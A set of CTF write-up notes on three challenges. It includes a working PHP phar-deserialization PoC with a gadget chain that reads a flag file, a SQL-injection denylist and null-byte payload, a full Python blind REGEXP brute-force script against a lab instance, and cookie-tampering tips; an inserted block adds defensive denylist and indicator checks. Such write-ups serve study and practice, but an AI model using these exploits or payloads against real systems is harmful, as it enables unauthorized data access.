[SWPUCTF 2018]SimplePHP

https://xz.aliyun.com/t/6454#toc-4

Key technique: phar deserialization


I ran into a problem while debugging locally!

file.php

<?php
header("content-type:text/html;charset=utf-8");
include 'function.php';
include 'class.php';
ini_set('open_basedir','/var/www/html/');
$file = $_GET["file"] ? $_GET['file'] : "";
if(empty($file)) {
    echo "<h2>There is no file to show!<h2/>";
}

echo 111;
echo $file;
$show = new Show($file);

echo 1111111;
$bb = $_POST['1'];
unserialize($bb);

if(file_exists($file)) {
    echo 1;
    $show->source = $file;
    $show->_show();
} else if (!empty($file)){
    die('file doesn\'t exists.');
}
?>

This is my debug file. But I found that with $show = new Show($file), when new Show() is called without an argument, execution just stops locally. Yet the challenge can still be solved!

poc

<?php
// Writing a phar needs phar.readonly=0 (php.ini, or php -d phar.readonly=0)

class C1e4r
{
    public $str;
    public function __construct()
    {
        $this->str = new Show();
    }
}

class Show
{
    public $str;

    public function __construct()
    {
        $this->str['str'] = new Test();
    }
}

class Test
{
    public $params;
    public function __construct()
    {
        $this->params = array();
        $this->params['source'] = '/var/www/html/f1ag.php';
    }
}

$a = new C1e4r();
$b = serialize($a);
echo urlencode($b);
$phar = new Phar("1.phar"); // the .phar file
$phar->startBuffering();
$phar->setStub('<?php __HALT_COMPILER(); ?>'); // fixed stub
$phar->setMetadata($a); // the entry point that gets triggered is the C1e4r class, so pass in a C1e4r object
$phar->addFromString("exp.txt", "test"); // write anything, just to generate a signature
$phar->stopBuffering();




//?file=phar://upload/585f1fbe32529f305013a803331675a1.jpg

//phar://upload/290b716447ed10fc5663195f9e34f86d.jpg


[NCTF2019]SQLi

Key technique: REGEXP regex injection

https://xz.aliyun.com/t/8003#toc-4

$black_list = "/limit|by|substr|mid|,|admin|benchmark|like|or|char|union|substring|select|greatest|%00|\'|=| |in|<|>|-|\.|\(\)|#|and|if|database|users|where|table|concat|insert|join|having|sleep/i";


If $_POST['passwd'] === admin's password,

Then you will get the flag;

I don't know why %00 still works even though it is clearly filtered!

payload

username=ad\&passwd=/**/||/**/1;%00  A null byte must come at the end! Otherwise the trailing single quote apparently can't be removed, and combining it with the semicolon is problematic.


A BINARY comparison converts the string to a binary string.

BINARY is blocked here (the denylist contains "in"), but it works without it too.

LIKE and REGEXP can both take hex values, and they are used the same way.
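To make the filter's gap concrete, here is an added Python example (not part of the original writeup): it ports the PHP denylist above, decodes the form body the way PHP fills $_POST, and shows that the literal %00 entry can never match the real NUL byte the decoder produces, which is why the payload passes while a legitimate password such as "Password123" is rejected for containing "or". The INDICATORS rule set is a hypothetical defender-side example of matching on structure instead of keyword spelling; the actual fix for the challenge's bug is a parameterized query, not a longer denylist.

```python
import re
from urllib.parse import unquote

# The challenge's denylist, ported from the PHP PCRE pattern above (case-insensitive).
BLACK_LIST = re.compile(
    r"limit|by|substr|mid|,|admin|benchmark|like|or|char|union|substring|select"
    r"|greatest|%00|'|=| |in|<|>|-|\.|\(\)|#|and|if|database|users|where|table"
    r"|concat|insert|join|having|sleep",
    re.I,
)


def denylist_blocks(value: str) -> bool:
    """True if the challenge filter would reject this (already URL-decoded) value."""
    return BLACK_LIST.search(value) is not None


def decode_form(body: str) -> dict:
    """URL-decode a form body the way PHP fills $_POST: '%00' becomes a real NUL byte."""
    fields = {}
    for pair in body.split("&"):
        key, _, raw = pair.partition("=")
        fields[unquote(key)] = unquote(raw)
    return fields


# Hypothetical detection indicators written for this note: they match on structure
# (comment-as-whitespace, raw NUL, hex literals) rather than on keyword spelling.
INDICATORS = [
    ("trailing-backslash", re.compile(r"\\$")),            # escapes the closing quote
    ("nul-byte", re.compile("\x00")),                      # truncates the rest of the query
    ("inline-comment-as-space", re.compile(r"/\*.*?\*/")),
    ("boolean-operator", re.compile(r"\|\||&&")),
    ("regexp-keyword", re.compile(r"\bregexp\b", re.I)),
    ("hex-literal", re.compile(r"\b0x[0-9a-f]+\b", re.I)),
]


def injection_indicators(username: str, passwd: str) -> list:
    """Names of every indicator that fires on either field, in rule order."""
    hits = []
    for name, pat in INDICATORS:
        if pat.search(username) or pat.search(passwd):
            hits.append(name)
    return hits


if __name__ == "__main__":
    form = decode_form(r"username=ad\&passwd=/**/||/**/1;%00")   # the page's payload
    print(repr(form["passwd"]))             # the three characters %00 are now one NUL byte
    print(denylist_blocks(form["passwd"]))  # False: the denylist never sees the text '%00'
    print(injection_indicators(form["username"], form["passwd"]))
```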

exp

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2021/7/30 15:35
# @Author : upload
# @File : [NCTF2019]SQLi.py
# @Software: PyCharm

import requests
import string
import time

proxy = '127.0.0.1:8080'
proxies = {
    'http': 'http://' + proxy,
    'https': 'https://' + proxy,
}
# Note: '$', '^', '.', '*', '{' and '}' are regex metacharacters, so a REGEXP match
# on them is not a match on the literal character (this is where the trailing '$'s come from)
dic = string.ascii_letters + string.digits + '_!@#$%^&*{}.-'
print(dic)
burp0_url = "http://2d7b07e2-08ce-4599-bead-39fff8394597.node4.buuoj.cn:80/index.php"
burp0_cookies = {"UM_distinctid": "179a8787815906-09d310bee36c31-5771031-144000-179a87878164ad", "OUTFOX_SEARCH_USER_ID_NCOO": "1935872068.9989924"}
burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": "http://2d7b07e2-08ce-4599-bead-39fff8394597.node4.buuoj.cn", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": "http://2d7b07e2-08ce-4599-bead-39fff8394597.node4.buuoj.cn/", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8", "Connection": "close"}


# burp0_data = {'username': 'ad\\', 'passwd': '/**/||/**/passwd/**/REGEXP/**/"^y";\x00'}
# r = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data, proxies=proxies)
#
# print(r.status_code)
# if 'The requested URL /welcome.php was not found on this server' in r.text:
#     print(11111)
# 404, apparently I can't check for 302, never mind


# Hex-encode so the comparison is case-sensitive
def str2hex(s):
    result = ''
    for i in s:
        result += hex(ord(i))
    result = result.replace('0x', '')
    return '0x' + result


flag = ''


poc = '/**/||/**/passwd/**/REGEXP/**/{};\x00'
payload = ''
for i in range(1, 1000):
    f = flag
    for j in dic:

        # print(j)
        passwd = str2hex('^' + flag + j)  # no quotes needed in the payload here; with quotes it does not execute at all
        poc22 = poc.format(passwd)
        # print(poc22)
        burp0_data = {"username": "ad\\", "passwd": poc22}
        # print(burp0_data)
        r = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data, proxies=proxies)
        if r.status_code == 404:
            flag += j
            print(flag)
            break
        elif r.status_code == 429:
            print('fast wait a little')
            time.sleep(3)

    if flag == f:
        break
print(flag)



#username=ad\&passwd=/**/||/**/1;%00

#^you_Will_never_kNow7788990$$$$$$$$$$$$$$$$$$$G

[watevrCTF-2019]Cookie Store

What kind of challenge is this!

Delete the session and send the request!

Then modify the purchase and that's it!